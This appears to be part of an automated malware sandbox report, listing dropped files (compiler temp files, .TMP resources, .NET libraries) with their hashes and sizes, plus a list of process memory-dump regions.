\??\c:\Users\Admin\AppData\Local\Temp\fyrutnv5\fyrutnv5.cmdline

Filesize
290B

MD5
4fae7980769efa44a3e0fe422767ba69

SHA1
a4b91504b586317abf38cda5e59774d0e4e77bed

SHA256
47179477f643cd081d651762178b3b76d9b33a1e25865fcb733792fd8962936d

SHA512
762cf292b16f30b23b510ad81bd090d8b0c0ccd3187cd9c6e2ae3c230812478820c62377293dde9766dd1f3e8a2828509a83a89fa4a3aa0591bf74a30e5ba067

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\h135o1ly\h135o1ly.0.cs

Filesize
1KB

MD5
0afe6c992b64cbec12518e1793eb51ce

SHA1
2c439f166e7c21810d1d8c9eb47ad521d9bfbf3b

SHA256
4bb926afd3b5ac0d6aba92ae37ed80c8a13b0b3305cb7b34125ca23f4e723f6f

SHA512
97048180c8a923b84e9b1fb64f9167a0fd8aae31cedd06a1aa4dfbedef4bbc67b91e6dd2fb163237285c93b7b923f0de9ef773163085cc33329e887998498b2a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\h135o1ly\h135o1ly.cmdline

Filesize
265B

MD5
8264b435091f6b7c83bafefef5a1ef7d

SHA1
8eb6e8466e1d36cc4e7cd2ab85c4c548cb4ace9a

SHA256
3759ab41cac1a049e02d1e8da1dbdc038fb279bc8d3f89458d574121fa29fdc2

SHA512
5ded78732c06478178531ede92f130efe39191bfa0c5f3d364596b144f30b201b089c4c847d44db39661d2c37cdf07c5bd51f66b5f68520ac00e6a15a7197e6f

Download Submit
\??\c:\Users\Admin\Desktop\CSC95B6CB12D8B14E4F9EA2D04B83BC5BC0.TMP

Filesize
1KB

MD5
8c0a1f2b904af16969873aa36f4fd60c

SHA1
a2509390671f63924f9124a81b515cff807cab99

SHA256
d8fc284ae033b8f26c85fa6272ea0a6ed42bab7d363f1dbcb1f60fafe7c47b9e

SHA512
9b06fc51cd3bd8c0d10d3a66812487e962893fcd43e2233b7f54865c0dc32d0ad065fb7b39421e82901f234f71845ebe87a44a105f0f87f7da2ea855edff0381

Download Submit
\??\c:\Users\Admin\Desktop\Resources\CSCB29CEAAD37BF4D099B113F5FDFD20ED.TMP

Filesize
1KB

MD5
333a89527ee2d98674b7607a0b5909c8

SHA1
afb254843d0b3aad025c8dd3eae3abafbacde89e

SHA256
5b1d2fdb1baa8c3ee0906a6e878ee1475252da1c80f8a09e3889252f543a3189

SHA512
b5412744ab529a39cc2ce64509195510afb7950d0bfe05733b2ff1cb6decdbc600037d6cbe0c1cca5e9017a8774e33bae258729ed6a9b9b6d6bede251bd99d5a

Download Submit
\??\c:\Users\Admin\Desktop\Resources\FfAATLCRNqJGAfs\CSCDB6E6F1A809F4C249F941895F55FDCA.TMP

Filesize
1KB

MD5
ec464049d7dfa1fb6f7cfa813c1784f2

SHA1
126abdd2ba0c3f6bfcb0ff8225c97ef4ce46c641

SHA256
980920db365496cc060eb81a220f6a7d0afc8c24c8ef3320fcc4f4cb9c52a556

SHA512
f60cf1c54968960b90541cdea3cfa1e05810b88592dbaf96ded216aa4a064b07199fa0c011d841df33a9423df56722d5b1f5b2c968048cb16c9edca370890546

Download Submit
\??\c:\users\admin\desktop\bouncycastle.crypto.dll

Filesize
2.5MB

MD5
f0b3e112ce4807a28e2b5d66a840ed7f

SHA1
54a6743781fd4ceb720331fce92f16186931192d

SHA256
333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c

SHA512
dc8ec9754c5e86f7e54e75ff3e5859c1b057f90e9c41788037b944a5db2cb3b70060763d0efcbe55ec595bcc47a9c0ff847a4876821470ca1659c31afd5b0190

Download Submit
\??\c:\users\admin\desktop\newtonsoft.json.dll

Filesize
659KB

MD5
4df6c8781e70c3a4912b5be796e6d337

SHA1
cbc510520fcd85dbc1c82b02e82040702aca9b79

SHA256
3598cccad5b535fea6f93662107a4183bfd6167bf1d0f80260436093edc2e3af

SHA512
964d9813e4d11e1e603e0a9627885c52034b088d0b0dfa5ac0043c27df204e621a2a654445f440ae318e15b1c5fea5c469da9e6a7350a787fef9edf6f0418e5c

Download Submit
\??\c:\users\admin\desktop\restsharp.dll

Filesize
166KB

MD5
09806e18f9f8e3f2351827be22e634e0

SHA1
54ec870ffb8ce10b3c8b05bbc7fb7ea45142a430

SHA256
0e7a0f3910741e81f9b4660501b30aab5eee71cfa4fa9dcc9b32acb64c865428

SHA512
45b5743bd3f50f51b6953bbfca9f8c5d1aca75aaed5cee0d6ef401034a05a09f27b928f539101801450b428ca7eac9ecc3ad0b41f2bc19258da52fbc7dc8ed09

Download Submit
memory/2452-162-0x0000000007180000-0x00000000071CE000-memory.dmp

Filesize
312KB

Download
memory/2452-427-0x0000000010440000-0x000000001044A000-memory.dmp

Filesize
40KB

Download
memory/2452-176-0x00000000742A0000-0x0000000074A51000-memory.dmp

Filesize
7.7MB

Download
memory/2452-175-0x00000000742A0000-0x0000000074A51000-memory.dmp

Filesize
7.7MB

Download
memory/2452-174-0x0000000008D40000-0x0000000008E8E000-memory.dmp

Filesize
1.3MB

Download
memory/2452-170-0x0000000008830000-0x00000000088CC000-memory.dmp

Filesize
624KB

Download
memory/2452-169-0x00000000076D0000-0x0000000007702000-memory.dmp

Filesize
200KB

Download
memory/2452-168-0x0000000007470000-0x000000000747A000-memory.dmp

Filesize
40KB

Download
memory/2452-167-0x00000000742A0000-0x0000000074A51000-memory.dmp

Filesize
7.7MB

Download
memory/2452-166-0x0000000007730000-0x0000000007982000-memory.dmp

Filesize
2.3MB

Download
memory/2452-147-0x00000000742AE000-0x00000000742AF000-memory.dmp

Filesize
4KB

Download
memory/2452-177-0x00000000742AE000-0x00000000742AF000-memory.dmp

Filesize
4KB

Download
memory/2452-415-0x00000000137C0000-0x0000000013806000-memory.dmp

Filesize
280KB

Download
memory/2452-158-0x0000000007270000-0x00000000073C0000-memory.dmp

Filesize
1.3MB

Download
memory/2452-423-0x00000000122E0000-0x0000000012306000-memory.dmp

Filesize
152KB

Download
memory/2452-196-0x00000000742A0000-0x0000000074A51000-memory.dmp

Filesize
7.7MB

Download
memory/2452-154-0x0000000006EA0000-0x0000000007016000-memory.dmp

Filesize
1.5MB

Download
memory/2452-150-0x0000000006450000-0x00000000064E2000-memory.dmp

Filesize
584KB

Download
memory/2452-419-0x0000000014090000-0x00000000140D8000-memory.dmp

Filesize
288KB

Download
memory/2452-149-0x00000000068F0000-0x0000000006E96000-memory.dmp

Filesize
5.6MB

Download
memory/2452-431-0x0000000012310000-0x0000000012340000-memory.dmp

Filesize
192KB

Download
memory/2452-148-0x0000000000020000-0x000000000194E000-memory.dmp

Filesize
25.2MB

Download
memory/2452-195-0x00000000742A0000-0x0000000074A51000-memory.dmp

Filesize
7.7MB

Download
memory/2452-194-0x00000000742A0000-0x0000000074A51000-memory.dmp

Filesize
7.7MB

Download
memory/3404-506-0x00000219DDAD0000-0x00000219DDB16000-memory.dmp

Filesize
280KB

Download
memory/3404-502-0x00000219C50A0000-0x00000219C50C2000-memory.dmp

Filesize
136KB

Download
memory/5044-402-0x0000000000330000-0x000000000033E000-memory.dmp

Filesize
56KB

Download
memory/5044-411-0x000000001C330000-0x000000001C386000-memory.dmp

Filesize
344KB

Download
memory/5044-521-0x0000000001200000-0x0000000001216000-memory.dmp

Filesize
88KB

Download